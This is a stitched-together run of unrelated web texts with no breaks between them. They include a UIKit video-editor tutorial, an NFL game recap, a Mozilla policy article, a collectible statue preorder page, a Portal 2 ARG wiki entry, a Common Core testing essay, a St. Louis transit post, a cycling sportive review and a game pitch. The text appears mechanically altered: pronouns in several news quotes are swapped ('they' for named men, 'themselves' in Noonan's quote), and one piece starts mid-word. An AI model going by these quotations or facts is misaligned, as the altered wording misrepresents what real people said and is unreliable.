Certainly. I can point really clearly to my development as a novelist and as a drummer. Earlier on in my career, the prose was really elaborate in some of my pieces. Sometimes I'll look at the prose and think “this is getting a little bit in the way of the material I'm delivering…so let me get out of the way when something exciting's going on”. That's a lesson I learned from playing the drums, where I'm backing up a riff that's really syncopated and interesting and it's time for me to lay down a straighter beat. If I'm playing underneath a really syncopated riff or something that's really exciting, maybe this isn't the time for me to throw in really elaborate drum fills or syncopated double bass stuff.
There's a connection with all these things. I'm not a great artist in terms of drawing, but I do that as well and I've studied animation. But a lot of it is just finding “are your techniques best serving your material?” As a drummer, as a lyricist, as a songwriter, as a novelist…all of it relates to that idea of: Is my skillset getting in the way of what I'm doing? Is it enhancing what I'm doing? Is it simply delivering what I'm doing? And I see those connections all the time. Definitely the kind of beats I'm playing on a Realmbuilder album and the type of prose in my most recent novels and screenplays have a very direct connection for me.
Today we're continuing our hunt for hidden gems in UIKit with UIVideoEditorController .
It's a cousin to UIImagePickerViewController that exposes just the basic video editing functionality from that class in a standalone, dedicated video editing view controller.
Let's give it a try.
First, we'll need a video file to edit. We'll use this one which is part of a freely available collection.
We'll download the video, rename it to something simple, and drag it into Xcode. We'll check the box next to our app in the dialog that appears, so it gets copied to our app target.
Now, let's write some code.
First, we'll make sure our video can be found:
guard let path = Bundle . main . path ( forResource : "video" , ofType : "mp4" ) else { return }
...and that UIKit knows how to edit it:
guard UIVideoEditorController . canEditVideo ( atPath : path ) else { return }
Nice. Next, we can create a new video editor view controller and configure a few things on it:
let editor = UIVideoEditorController () editor . videoPath = path editor . videoMaximumDuration = 10.0 editor . videoQuality = . typeIFrame1280x720
Here we've told it our path, and given it a 10 second max duration. (Pro Tip: Default is 10 minutes, set to 0 for no max).
From here we can simply present it like any other view controller:
present ( editor , animated : true , completion : nil )
Neat!
The best part is all the functionality is self-contained inside the view controller.
The user can scrub through:
Trim the edges:
Then save the video back to the videoPath we set earlier:
Note: The documentation mentions UIVideoEditorController "only supporting Portrait" orientations, but it seems to work fine in all orientations.
Last but not least, we can (optionally) set a delegate on our UIVideoEditorController to get notified when the user saves or cancels (or a save fails):
editor . delegate = self extension SomeViewController : UIVideoEditorControllerDelegate , UINavigationControllerDelegate { func videoEditorController ( _ editor : UIVideoEditorController , didSaveEditedVideoToPath editedVideoPath : String ) { print ( "saved!" ) } }
That's all for today. Know of an interesting UIKit B-side?
Send it on over!
191 SHARES Share Tweet
ight after cutting Minnesota's lead to two touchdowns, the Tampa Bay Buccaneers forced the Vikings into their only three-and-out of the game.
The window for a rally was still open early in the fourth quarter, until it slammed shut with an errant pass by Jameis Winston.
Andrew Sendejo picked it off and returned it 36 yards to the Buccaneers 35, setting up a field goal that gave the Vikings a three-score lead.
CONTINUE BELLOW AFTER THIS AD
The momentum was gone, and Mike Evans was mad.
The star wide receiver stomped around on the sideline before kicking a water bottle and shoving over a towel cart . After a commanding victory over the Bears in Chicago to start their season, the Buccaneers took several steps backward in a 34-17 defeat on Sunday by the Vikings .
The frustration was evident.
“I can't do that. I'm a captain. I got to fight my emotions better than that,” Evans said. “Playing with passion is cool, but I've got to fight my emotions better than that, and I've got to understand it's just one game. I wanted this one bad.”
Evans, who was shadowed by Pro Bowl cornerback Xavier Rhodes, had a quiet seven catches for 67 yards. DeSean Jackson, the intended target on the pass Sendejo intercepted, had four receptions for 84 yards and one touchdown. But the Buccaneers (1-1) were playing from behind from the start.
Winston went 28 for 40 for 328 yards, but they were picked off three times, twice in the end zone.
“I make the final decision on where the ball goes, and I've got to protect the football at all costs no matter what they do,” Winston said.
Now the Buccaneers, with injuries to several key players on defense, play twice in the next 11 days with the New York Giants and New England Patriots visiting.
“Hopefully we can get the taste out of our mouth,” Jackson said. “It's still a long season, and we have 14 games to go.”
Evans and Jackson were in the spotlight all afternoon, after they took a knee with their hand on their heart during the “Star Spangled Banner” to join the rebuke of President Donald Trump's recent obscene remarks about players protesting social justice by kneeling during the national anthem.
“However anyone takes it, I'm a firm believer that everyone has their own rights,” Jackson said. “It's more unity than anything. We don't want to be individualized.
“We don't want to take away from our overall goal, which is to go out there and play football. But at the same time, we do have feelings toward things that are being said out there in the world.”
Evans was even more pointed with their criticism of Trump.
“It was very childish on their part,” Evans said. “It seems like he's trying to divide us.”
The game went like this…
Case Keenum gave Minnesota a brilliant performance in relief of Sam Bradford, passing for three touchdowns and a career-high 369 yards without a turnover to guide the Vikings to a 34-17 victory over the Tampa Bay Buccaneers on Sunday.
Stefon Diggs had 173 yards receiving and caught two of Keenum's throws for scores, one short and one long.
Dalvin Cook produced 169 total yards plus their first NFL touchdown, which capped a 75-yard drive by the Vikings (2-1) to start the game.
They never slowed down, building a 28-3 lead by early in the third quarter on their way to compiling 494 yards.
Trae Waynes and Harrison Smith each picked off Jameis Winston in the end zone, and Andrew Sendejo returned an interception 36 yards in the fourth quarter to set up one of two field goals by Kai Forbath.
Shadowed by Vikings cornerback Xavier Rhodes, Buccaneers wide receiver Mike Evans had a quiet game with seven catches for 67 yards. When the offense returned to the sideline following Winston's third interception, Evans was shown on the TV broadcast angrily shoving over a trash can by the bench.
DeSean Jackson and Cameron Brate each had four receptions and a touchdown while Winston completed 28 of 40 passes for 328 yards, but the Buccaneers (1-1) simply couldn't overcome having to play from behind all afternoon. They converted only one of six third downs.
Keenum, meanwhile, went 25 for 33 in the third 300-yard game of their career. With Bradford out for the second straight game because of an ailing left knee, the undrafted former practice squad player with 26 starts in six NFL seasons took full advantage of a Buccaneers defense depleted by injuries.
Well protected by a vastly improved offensive line, Keenum was not sacked and only occasionally hurried. They put on a play-action passing clinic, finding Diggs and fellow wide receiver Adam Thielen (five catches, 98 yards) open at will.
FOR STARTERS
With widespread rebuke around the league toward President Donald Trump for their obscene criticism of the kneeling by players during the national anthem in protest of social injustice, Evans and Jackson each took a knee with a hand on their heart in front of the bench as the “Star Spangled Banner” played. Other Bucs players locked arms in solidarity.
Nobody was kneeling on the Vikings sideline, but many players also stood arm in arm, with owners Zygi Wilf and Mark Wilf and general manager Rick Spielman joining them. Right before the anthem played, about a dozen Vikings ran to the west end zone and knelt with their heads bowed, including Cook, Diggs and Thielen.
BANGED-UP BUCS
Already without three starters for health reasons, defensive tackle Chris Baker, linebacker Kwon Alexander and cornerback Brent Grimes, the Buccaneers defense took even more hits during the game. Backup defensive end Noah Spence was in and out with a shoulder injury.
Standout defensive tackle Gerald McCoy, who was limited this week in practice by an ankle problem, limped off twice in the second half before returning from each absence.
Then linebacker Lavonte David was lost in potentially the biggest blow. They had the back of their leg rolled on inadvertently by a Vikings player during a scrum around the ball in the fourth quarter and left the field on a cart.
UP NEXT
The Buccaneers host the New York Giants on Sunday.
The Vikings stay at home to face the Detroit Lions on Sunday
—-
Case Keenum has 3 TD passes and Vikings top Tampa Bay Buccaneers 34-17. Mike Evans Loses Cool as Bucs Go Backward in Loss to Minnesota Vikings.
Mozilla produces the Firefox Web browser. (Chris Ratcliffe/Bloomberg)
Mozilla has a warning for Web users: The push by some companies to squeeze ever more Internet consumption into apps risks undermining the neutral, public Internet.
The urge to caution comes amid a widening debate over the way clunky advertisements and behavioral trackers have slowed down the Web and introduced security risks for unsuspecting users. Companies including Apple and Facebook have rolled out their own ways of coping with the problem, from introducing support for ad-blocking in iOS to a special feature in Facebook's mobile app, called Instant Articles, which hosts Web content on Facebook's servers to speed loading times.
Though well-intentioned, moves such as these could create new gatekeepers and silos of information access online, said Mozilla, which produces the popular Firefox Web browser.
"I would definitely say that's something we'd be concerned about," Chris Riley, Mozilla's head of public policy, said in an interview. "We are strong believers in the power of the Web as a generative and pro-innovation environment."
By circumventing the flawed Internet with technical workarounds that drive more Web users to proprietary platforms, Silicon Valley firms could fragment the open Internet — and draw focus away from the key principles Mozilla says should motivate tech companies. For example, companies should improve the Web's overall performance and security instead of blocking or banning specific types of content, such as advertising. They should also offer users "meaningful controls," according to a blog post Mozilla published recently.
"If content blocking creates new gatekeepers who can pick winners and losers in the publishing space or who favor their own content over others', it ultimately harms competition and innovation," the post read.
Facebook declined to comment on the matter, and Apple didn't immediately respond to a request for comment.
Other companies have sought to speed up the Internet by stripping away all but the most important code in a Web page. This is the logic underpinning Accelerated Mobile Pages, a project by Google. Web sites that use Google's code not only stand to load more quickly for technical reasons, but the faster speed also may cause those pages to be ranked higher in Google searches.
Efforts to carve up the Web with alternative services that circumvent the Internet, or specific parts of it, would lead to the "slow death of the Web," predicted the Verge's Nilay Patel.
"So it's Apple vs. Google vs. Facebook, all with their own revenue platforms," said Patel. "Google has the Web, Facebook has its app, and Apple has the iPhone. This is the newest and biggest war in tech going today."
It's a war that Mozilla is trying to stop.
"If we can't figure out how to improve consumer trust, our industry is in for a very, very difficult future," Riley said. "We're at sort of the precipice of a broad understanding of the threats to consumer trust going forward, and content blocking is one major piece of that."
They added, "I do think there are going to be opportunities to work within the tech industry to build a better path together."
Yes, there has been a lot of speculation about Daft Punk touring in 2017. No, of course we cannot confirm anything.
But here we are again with another little glimmer of hope about an Alive 2017: Lollapalooza has a Daft Punk tag on their website. Yep. If you don\'t believe it, see for yourself.
To make rumors more real, the tag has only been traced back to February 3rd of this year. It also does not appear on Lollapalooza Chile\'s site, prompting us to believe the pair may return to Chicago for a performance.
Though this doesn't\'t confirm anything, it leaves us a bit more optimistic. Since the robots have toured every 10 years beginning in 1997, 2017 would only be fitting for their next appearance.
H/T: Reddit
Thank you everyone for supporting our Metal Gear Solid - Solid Snake Preorder.
The only thing left now is for the the RE-LAUNCH, with all the physical changes, coming soon in Q4 2017 (More info will be announced before then)
See you all again SOON!
*8th September 2017* Hey guys - wanted to let you know that we have provisional changes in 3D of the following things for Snake:
1) Colour scheme change.
2) ADDITIONAL head sculpt
3) Original head sculpt with reduced hair on back of neck
4) Adding snow effect on base
5) Ammo box will come with orange stripe
6) Reduced arm thickness
Updated images in the picture gallery. We will now open pre-orders on the 12th September for Solid Snake for 3 days (closing on the 15th September) and then reopen Snake for preorder for a further 11 days at a later date (after the provisional changes have been made to the physical prototype).
Thanks so much for all your feedback on improving over the original prototype!
************
*4th September 2017* Hey guys - so we've been hard at work finishing the Snake change proposal as highlighted in the Collector's Club and was about to submit it to the licensor. One thing I didn't realise until now, is that it's a holiday in the US on Monday (today). That means I can't get any confirmation from Konami on any changes until AFTER tomorrow's launch. I had hoped that I would have had confirmation on any changes before. The holiday has put a spanner in the works.
As a result, we will delay the launch until we know with confidence on whether the changes have been approved or rejected so that people can preorder with a clear understanding on what the final product would look like.
I would not want anyone ordering with the assumption that the changes will happen, only to find out that it won't be changed.
For your reference - things that we've looked into are: SOCOM gun, reduced muscle bulkiness on arms a little, paint scheme and hair.
Also, for the stealth camouflage version, we are now working on a neon green version as well and are looking into allowing you to choose the version you want yourself. Of course, this is also subject to Konami approval.
In the meantime, I will keep you guys informed the moment we have any news. I hope you can understand my decision and I appreciate your understanding. I apologise that there has been a lot of back and forth - your feedback needed to be listened to and tried our best to turn around as quick as possible. Thanks guys.
NOTE: The Metal Gear Solid - Solid Snake TWIN SNAKES combo edition will only be available for preorder until 15th Sept 2017
First 4 Figures is proud to present the highly anticipated Metal Gear Solid - Solid Snake statue.
With the real name of David, Solid Snake was a former spy, special ops solider, and mercenary. Being fluent in six languages and possessing an IQ of 180, Solid Snake was known as "the Man Who Makes the Impossible Possible". They became a living legend among the military black ops because of their deeds.
Solid Snake is the product of the Les Enfants Terribles project which produces clones of the world renowned soldier Big Boss.
At first Snake was a Green Beret but then they were later initiated into High-Tech Special Forces Unit FOXHOUND while it was under the command of Big Boss. Snake became a war hero for stopping potential nuclear catastrophe three times by repeatedly disarming and destroying the latest incarnation of Metal Gear.
The Metal Gear Solid - Solid Snake TWIN SNAKES combo edition includes the Metal Gear Solid - Solid Snake Statue STEALTH CAMOUFLAGE edition as well as the Metal Gear Solid - Solid Snake Statue EXCLUSIVE edition for the Ultimate Metal Gear Solid fan.
TWIN SNAKES combo edition ONLY - TWO extra Cards designed exclusively for this edition
Cardboard box packaging capturing the infiltration essence of Metal Gear Solid.
Purchasing the Metal Gear Solid - Solid Snake TWIN SNAKES combo edition at anytime during Day One after the launch starts (24 hours) will entitle you to the following extra free bonuses.
An additional Signature Card signed by Alex Davis x 2. A Day One edition Hologram Sticker. Plus extra F4F Reward Points.
Limited Edition number to be set later on.
This is the first statue in First 4 Figures' Metal Gear Solid Statue line. The lowest numbers will be available to those who pre-order earliest, so don't delay if you wish to have the best chances of securing a low number!
*Prototype shown, final product may be slightly different. Product details can subject to change without further notice.
Subject to final approval.
Estimated Release Date: Q3 2018
From Portal 2 ARG Wiki - Valve ARG Network
Potatoes
Easy Potatoes
We believe we need to get more potatoes as quickly as possible, so you might want to grab some easy ones first. Here are some suggestions:
Nelipot group Amnesia, make a profile with "Casbah" as the profile name SuperMeatBoy, "die 11 times in world4 lvl19" and the search "for meaning" in world -1 DefenseGrid has 5 console related potatoes RUSH, use YouTube for the solutions The Ball, use the savegame+instructions, or use the console commands BIT.TRIP BEAT, play the "Descent" level, and the <test> level until you have 3 potatoes or
play the <test> level, save the k=x (where x is a 10-digit number), and plug into the other 2 links. Killing Floor, Finding the manolantern in bedlam can usually be done in a matter of seconds if you use the video guide.
User validation errors
If you keep getting an error when the Aperture Science pages open, it might be because your Steam Overlay is no longer signed in to the Steam websites. Go to steamcommunity.com / steampowered.com in your overlay and see if you are logged in or not. Logging in manually or restarting Steam should fix the problem. You don't need to do all the steps for the potato again; if you copy the URL from the address bar when the overlay pops up, you should be able to just put that in any browser, provided you are logged in to the Steam websites.
Potato hack website
For a limited time, a website existed that would use your Steam details to determine the correct URLs that would open the appropriate Aperture Science login screens that would lead to being granted a potato. Valve has identified and stopped this site, as it was against the spirit of the ARG, and while they let people that earned pototes this way keep them for most of 4/17, they eventually removed this ill-gained taters. Players still have the opportunity to earn them legitimately.
Logging in an environmentally significant old growth forest in Victoria will remain banned until the state government implements a host of measures to protect endangered species.
Victoria's Supreme Court has upheld the ban preventing logging at Brown Mountain in the state's far east under an injunction, while a number of surveys on endangered wildlife are carried out.
In a decision hailed as a victory by environmentalists, Justice Robert Osborn also ordered special protection zones and "habitat retention" areas be created at Brown Mountain, north of Orbost in East Gippsland before logging can start.
Anti-logging campaigners Environment East Gippsland took action in the Supreme Court last year to stop the state-owned timber agency VicForests logging at Brown Mountain.
Logging was due to start at the site last September but it was halted until the outcome of the Supreme Court trial, which took place in March.
The verdict is in on Romney's response to the embassy attacks in Libya and Egypt, and it's not been kind to the former Massachusetts governor.
Romney, in case you somehow missed it, seized on a U.S. embassy statement cautioning against “efforts … to hurt the religious feelings of Muslims” and pronounced it “disgraceful that the Obama administration's first response was not to condemn attacks … but to sympathize with those who waged the attacks.” (He doubled down on the criticism this morning.) The mainstream media promptly proclaimed the response “over the top,” while Republican foreign policy hands griped that it was a “Lehman moment” and exposed Team Romney as “not ready for prime time.” Peggy Noonan, normally a reliable partisan, told Fox News that “I don't feel that Mr. Romney has been doing themselves any favors in the past few hours, say since last night” and that “sometimes when bad things happen… cool words or no words, may be the way to go.” Even Romney's allies in Congress seemed to implicitly distance themselves from their comments.
It's worth stipulating that Team Romney's political instincts weren't entirely off-the-wall. Any time there's a deadly attack on American officials abroad, it's reasonable to ask if the president deserves blame. No one would begrudge Romney for raising the question. But the tone and timing of the criticism were self-defeating in ways large and small. Small because, as the news accounts have pointed out, the U.S. embassy statement came before the start of the protests in Cairo and Libya—however ham-handed, it was an attempt to preemptively defuse them, an impulse no one can begrudge an embassy official under threat of violence, not an after-the-fact apologia. Meanwhile, the Obama administration had actually disavowed the statement before Romney released their own critique. (Yes, the Romney campaign can legitimately ask why it took 16 hours to walk back the flaccid statement, which did fill the vacuum left by the administration's silence. But, you know, they had a few things on their plate. In any case, it's not clear how a rhetorical escalation would have calmed the situation.)
The larger problem is that there just wasn't any percentage in the move for Romney. If the attacks turn out to expose a major failing on the part of the administration, we'll know about it soon enough, at which point Romney will be free to criticize relentlessly. And if the attacks rally the public behind the president—already there are suggestions of an Al Qaeda plot in Libya, which could require retaliation—then Romney will be isolated and exposed.
As we read of the 17 states across the country where a strong backlash has grown against Common Core, my own state of California is conspicuous by its absence. California has yet to see a strong reaction against the Common Core, for several reasons. The State Superintendent of Education, Tom Torlakson, has taken the slow approach recommended by leaders like Randi Weingarten. As a result, California students will take only trial tests from the Smarter Balanced Assessment Consortium (SBAC) for the first time this coming spring, and they will not be used for accountability purposes. And the state will not ask students to take the old STAR tests, aligned to the old state standards. The California Teachers Association has thrown its support behind Common Core implementation, and the state is spending $1.25 billion to prepare for the transition.
Lots of open questions remain, however. There has been a strong emphasis on the new standards being "more rigorous." In other states, that has translated into difficult tests, and a sharp drop in the number of students considered proficient. English learners, who are numerous in California, have done very poorly on the Common Core tests used thus far in other states. So the first question is whether the SBAC tests will yield similar drops in proficiency.
Another big question has to do with the qualities of the tests, and how we are measuring skills. One of the selling points of this shift has been that these tests will be better able to measure critical thinking, less prone to narrow the curriculum to test preparation. So California teachers are using the extra time we have to take a closer look at the questions on these tests.
Today, a Sacramento teacher and blogger, Alice Mercer, took a detailed look at some sample questions on the Smarter Balanced test.
(source: Sample Items | Smarter Balanced Assessment Consortium)
Alice Mercer explains their reaction.
The item above comes from a sample item on the SBAC (Smarter Balanced Assessment Consortium) website, and it's supposed to assess the writing of an argument (what used to be called persuasive writing). Click on the image to get a larger view to read the task. I'm sharing this because this week I administered a similar writing task at my site recently. Students were given a sheet of facts and statistics, and a sheet of arguments for the two positions they had to choose from, to write a 5-paragraph essay. When we were previewing the tasks, it seemed questionable to give students a list of "arguments" since this would make this a much lower-level cognitive task, and not require any analysis on the part of students. When you look at this type of task, you have to wonder why they would do things this way, and how they could insist that these tasks are at a "higher" cognitive level and more demanding than past writing prompts. Of course, in the past writing was only assessed at a state level in 4th and 7th grade in California, and now we're including it every year in tests. I know, I know, teachers in classrooms, and many sites, were doing summative writing assessments, but there's a difference. Common Core wants to do whole-scale standardized assessments of writing. There are some drawbacks to that. It's time-consuming, and it's expensive, but not if you figure out a way to continue to machine/computer grade essays and writing, just as current multiple-choice tests are done. It would explain much about why the standards have been structured the way they were, and why some of the tasks we're seeing are the way they are, but it also ensures that what we're asking students to do will be so constrained by the parameters of the testing environment that they will be useless to judge authentic student learning. I'm not the only one who's thinks that the assessment has determined the standards. Here is an excerpt from Tom Hoffman: But... what's the deal with that fourth grade standard, particularly (my emphasis) Determine a theme of a story, drama, or poem from details in the text... I read these things and even now they seem perfectly reasonable at first, but then they worm around in my brain for a day and a half or so and stop making sense. Why would you tell a fourth grader to determine the theme from details? ... I'm sure it is just the testing guys throwing in the "details in the text" so they could write the kinds of questions they had in mind, e.g.: Part 1: The theme is a) Love; b) Death; c) Both Part 2: Which of the following details support your answer... (end of excerpt from Tom Hoffman) There has been talk about computer grading of these assessments, including writing, since they were first being developed. This piece that appeared in the NY Times a while back talks about some of the limitations of robo-readers, but Tom Hoffman gives a delightful example of the shortcoming here, Computer Scoring Open Ended History Questions - Tuttle SVC. Basically, the programs can judge grammar and usage errors (although I suspect it will lead to a very stilted form of writing that only a computer could love), but it's not in the position to judge the facts and assertions, or content in an essay. The only way to do that is to limit students to what "facts" they are using by giving them a list. It would also explain the love for a certain type of closed-reading instruction in Common Core, and the hostility to background knowledge and information, that's written about in this piece by Paul Horton: Common Core and the Gettysburg Address - Living in Dialogue - Education Week Teacher. Even if my assertion that the standards were written to accommodate testing, and more specifically machine scoring of writing are wrong, these are still lousy tasks that are very low-level and not "rigorous" or cognitively demanding.
I have some concerns to add in addition to the ones mentioned by Alice.
When we, as teachers, write tests we will grade ourselves, we can offer open-ended questions, because we are able to understand a wide range of responses. Therefore, these tests can allow and even encourage creativity and critical thinking. But when tests are standardized, and even more when they are designed to be scored by computer, they are training our children to think like the computer and predict what the computer wants them to write. The tests are designed to be scored by computer because this is by far the least expensive means available -- and it will yield uniform results. No human errors possible -- unless the human error is in trusting machines to make such judgments in the first place.
Tests have become so consequential that every one of them is in essence a training exercise. We are training our children to respond as the test-maker wishes. And as our evaluations begin to be based in part on their scores, we are strongly motivated to train them in this manner.
This reveals one of our basic fears as educators and parents about the Common Core and associated tests. The project is an attempt to align and standardize instruction and assessment on an unprecedented scale. The future, according to the technocrats who have designed these systems, involves computer-based curriculum and tests, and frequent checks, via computer, on student performance. And as this report in EdWeek indicates, there is great deal of money to be made. Los Angeles Unified has already spent a billion dollars on iPads, and one of the chief justifications was to prepare for computer-based assessments such as these.
Here we are beginning to see the ways in which grading technology may be shaping the tests, and the very way we ask students to show how they are applying the skills they have learned. If this is the "Smarter" test, it seems far less intelligent than a qualified teacher, capable of challenging students with an open-ended question. And if we are sacrificing intelligence, creativity and critical thinking for the sake of the efficiency and standardization provided by a computer, this seems a very poor trade.
What do you think of the observations made by Alice Mercer? Have these tests been designed so computers can grade them? Is this "smarter"?
Continue the dialogue with Anthony on Twitter.
{Transit riders connect to busses from MetroLink at the Civic Center Transit Center}
In a very short post on my Gateway Streets blog yesterday, I posed a very simple question. From just about anywhere in the St. Louis region, "will this bus take me to downtown St. Louis"? The answer, as I so emphatically illustrated below, is "NO!" For people unfamiliar with St. Louis's public transit system, that answer may seem confusing and incorrect. After all, a quick glance at the Metro system map shows many bus lines threading their way through downtown.
Regular bus riders, on the other hand, know just how misleading lines on a map can be. They know that any trip to downtown will inevitably mean a forced transfer at the Civic Center Transfer Center. They know that local buses east of 14th St are virtually nonexistent. They know that the only buses that traverse the heart of downtown are express buses that operate only at peak times in the peak direction.
To illustrate the problem, compare the two maps of downtown St. Louis below. The first map is the current Metro system map. The second map has been modified to show only the local bus routes: MetroLink, MCT buses, express buses, and the 99 Downtown Trolley have all been removed. The second map shows what the bus system looks like to bus riders most of the time.
Can you see any notable gaps in the Metro bus system?
Bus Riders: Second Class Citizens?
The importance Metro has applied to the Civic Center Transfer Center explains the sheer lack of bus service downtown. Given that most of Metro's bus routes operate at 20-minute headways or worse, the transfer center allows Metro to operate its buses on a pulse schedule. A pulse schedule is where a group of buses arrives at the transfer center generally at the same time, wait to allow riders to change buses or connect with MetroLink, then depart. Servicing this pulse forces and encourages Metro to divert buses around downtown to reach the transfer center's 14th St location.
While the pulsing of the Civic Center Transfer Center enables Metro to create a more efficient bus system, this does not excuse Metro from not properly servicing downtown. In fact, by "fencing" buses west of 14th St and forcing people to connect to another bus or train, Metro is sending a signal to bus riders that they are second class citizens of the Metro transit system.
How so? Contrast the routing of local buses down 14th St with the proposed Northside-Southside MetroLink alignment. The Northside-Southside alignment travels along 14th St both north of Delmar Blvd and south of Clark St. But between those two streets, the proposed routing takes pains to shift east to 9th and 10th streets to travel through downtown. Why is MetroLink getting routed through downtown while buses are stuck on the periphery?
Comparing Metro's lack of bus service downtown to other cities only further drives home the point. Not one other major US city, not one, has such little bus service to its downtown core as St. Louis. Only Boston comes close, but Boston has the advantage of having multiple rapid transit lines radiating in all directions out of downtown.
Downtown is the largest center of jobs in the St. Louis region. Thousands of people now live there, too. Downtown is where the people are, it where the people want to go. Not every bus needs to go downtown, but Metro could make a lot of regular bus riders happier by giving downtown the bus service it deserves. A small circulator is not enough.
The Giant store on the shores of Rutland Water is the start and finish point for a new Sportive, the Giant 365. There are two main routes - a 96-mile long loop and a 62-mile shorter version - taking in the lumpy and scenic terrain between Melton Mowbray to the north and the Vale of Belvoir to the south. But there's no need to put a date in your diary; this is a timed challenge that you can do whenever it suits you.
The Giant 365 is so named because it's available to ride 365 days a year. You get a timing chip from the Giant store, swipe a terminal on the exterior of the shop then take your map and work your way round the route. There's two intermediate timing points on the shorter route (with an extra one on on the long loop), and you swipe yourself back in at the end, whereupon you can get an instant confirmation of your time and see yourself added to the roll of honour. All the timing stations are externally mounted, so assuming that you've picked up your timing chip in advance you can do the ride whenever you like, even when the Giant store is closed.
The hardware supporting the Giant 365 is tried-and-tested stuff from timing specialists SPORTident. They've been developing their system for years, and you may have used it at events in the past, and not just cycling ones; the system of dibbers and timing points was originally developed for orienteering. Unlike the more usual timing mat systems, which bleep you out as you cross the start line and back in as you finish, the SPORTident system relies on you swiping your timing card on a timing station, which writes the information to the chip. The chip can store a number of times and they get downloaded at the finish line, where you can get a printed receipt showing the breakdown of your ride; often the numbers get uploaded to a result website too as is the case on the Giant sportives.
Obviously this means that you can't have a hundred riders rolling out at the same time and the start gate registering them all instantaneously. But it's a simple system that works extremely well, and it's used on open-start sportives such as the Fred Whitton Challenge with upwards of 1,200 participants. It also lends itself to being used on static events, and that's what's happening at Rutland Water. The Fred Whitton was the first ride in the UK to use the SPORTident system to log riders at any time of day or night as the FWC four seasons, and the Giant 365 is following on the back of a very successful launch up in the lakes.
The routes themselves have been set with the help of Ian Penrose from Velo Club Rutland, who's responsible for organising other sportives in the area, including the Rutland CiCLE Tour and the popular Lincoln GP sportive with its cobbled climb finish. Ian joined us on the day to show us around the route, which takes in much of the same area as the CiCLE Tour. It was also helpful to have them shouting directions; The Giant 365 routes are waymarked but obviously the fact the signage is permanent means that it has to be fairly unobtrusive, not like the huge arrows you'd expect on a mass start event. Your free map and the little orange arrows should see you round okay even if you're not familiar with the area, but it's not like the follow-the-leader feel of a big sportive: you need to know which way is up on your map.
The route heads out west from the Giant store through Wing and Preston then turns north towards Oakham, at which point the flat terrain gets decidedly more lumpy. This is one of the final stretches of the CiCLE classic, Ian tells us, the elite day race that's run partly on the unsurfaced gated roads and farm tracks around the area. After ninety miles of hard racing the short, sharp climbs and descents must really hurt the legs; after a half marathon the day before I was doubting my ability to cover 100km on this terrain! Thankfully after that the profile flattens and it's swoopy and fast as far as Wymondham and the Windmill Cafe, where the first intermediate timing station is located. Reserves of cake are located there too, thankfully. The timing stations allow you to swipe yourself in, have a bit of a sit down and a cup of tea and then swipe yourself out when you leave, so you can see your time with and without stops.
After the stop it's flat for a little bit longer before the needle points to lumpy again, and this time it stays there. Okay there aren't any mountain ranges in Leicestershire, but there's plenty of climbing in this route and the back leg is a real energy sapper, with the climb past Launde Abbey a particular reminder of how much the early season fitness is lacking. Ian tells us that the longer route, which dips down into the Vale of Belvoir, features some of the region's more feared climbs on top. Certainly the short ride is no picnic. Things get a bit more gentle through Hallaton and the impressively moneyed Horninghold – more a collection of mansions than a village – before a swooping, alpine-style climb up to Uppingham which will bless you with superb views back over the countryside if you can tear your sweaty gaze from the tarmac in front.
There's another card swipe in the middle of Uppingham (a bit off route so happy hunting) before a couple of final climbs to Morcott and North Luffenham and a short hop back to the Giant store and a well earned sit down. With a 20-minute stop for coffee and cakes at the windmill we trundled round in 4:25, which wasn't too bad considering Ithe excesses of the day before and the fact that I was also struck down with the lurgy. Excuses, excuses...
If you want to try the Giant 365 out for yourself then the Giant store at Rutland Water is the start and finish point, and they're the ones handing out the timing chips. There's a £25 deposit for your chip of which you get £20 back when you're done, and the proceeds from the 365 will be going back into local cycling clubs. You can order the chips from the store so they're ready to pick up when you arrive, and you can post them back through the door if you finish the ride when the shop is closed; they'll download your ride times and make sure you get on the wall of fame.
Many thanks to Ian from Velo Club Rutland for being our guide for the day, and Kieran from Giant for riding with us, at least until they disappeared up the Uppingham climb... Thanks also to Dave from Giant for inviting us down and lending us a TCR Advanced 3 for the ride; we'll be testing that bike on road.cc soon so stay tuned for that.
About
A in progress viewing point
The Story
Once upon a time there was a man
The end.
Really, that's it. What, you want to know more? Listen, I don't think you understand but this guy is average incarnate: uninteresting squared, mediocre personified, just plain BORING. I mean here's a guy who never got picked first for kickball and never got picked last, always dead center. If an odd number of people were playing, they would be the umpire, and even then they didn't yell when they made calls. I apologize for making it sound like this guy is actually joyless enough to be deserving of pity or at all interesting because, honest to God, they are not. Take it from me; I had to live with the guy for years.I know what you're thinking: is there ANYTHING interesting about this guy? Well, there IS this one thing.
It was a thought, but not just any thought. This was the first genuine creative spark in crevice of a consciousness. There are plenty of primal urges, basic history facts, memories of childhood experiences, and things of that nature in this guy's head already, but this thought was special. It was a true idea that had spawned within their own skull, a miracle, a flower spontaneously blooming on the moon. Teams of scientists could study it with multimillion dollar lab equipment and never determine if it actually exists.So this thought, let's call them The Idea, is already an outlier, but now, they have to make themselves known to our guy. They have to escape this guy's abyss of a subconscious and make themselves known, maybe even have an effect, all while shooting bad thoughts, solving puzzles and trying to break through this guy's brain.What happens next?
Well that, my attentive and patient friend, is where you come in. Help The Idea through the labyrinth of dull subconscious to the vastness of consciousness. More importantly, help us to make Thoughts? a reality .Any questions? I'll do my best to answer.
The Game
Thoughts? is a 3D platformer set inside the mind of the least-creative person on Earth. You, The Idea, are tasked with defeating other evil and/or distracting thoughts and navigating your way through several different levels in order to make yourself a conscious thought.
The concept arose when I was trying to think of an idea for a game to make and I felt like I just couldn't stop being distracted by meaningless distractions I imagined a creative thought getting stuck.
The game play for Thoughts? is based around the dots that follow behind The Idea. The main function is to hurt enemies by shooting them out of him. When enemies die they also leave behind a dot upgrade that changes what the dot does, adding status effects, power, or even allowing them to break through walls.
The world of Thoughts? will be imaginative and funny, with various levels based off the different sections of the brain, for instance at the beginning of the game you start at the instinctual animal part of the game and should bring back memories of the great 3d platformers of the n64 era.
The Main Characters
The Idea
Smart, powerful, and naive they work their way through this game to the end based solely on good luck, good timing, and smart friends.
Procrastination
The Goomba of this game quick and weak they make the perfect base class to continue on their dastardly ways
Academia “Nerd” Thought
Cynical and quick witted they will help you through any situation - although not without making a jab about why you are there in the first place.
UTP (or Urge To Pee)
The Ranged enemy very sluggish dull but watch out because they are always willing to get in a quick shot
How We Are Funding
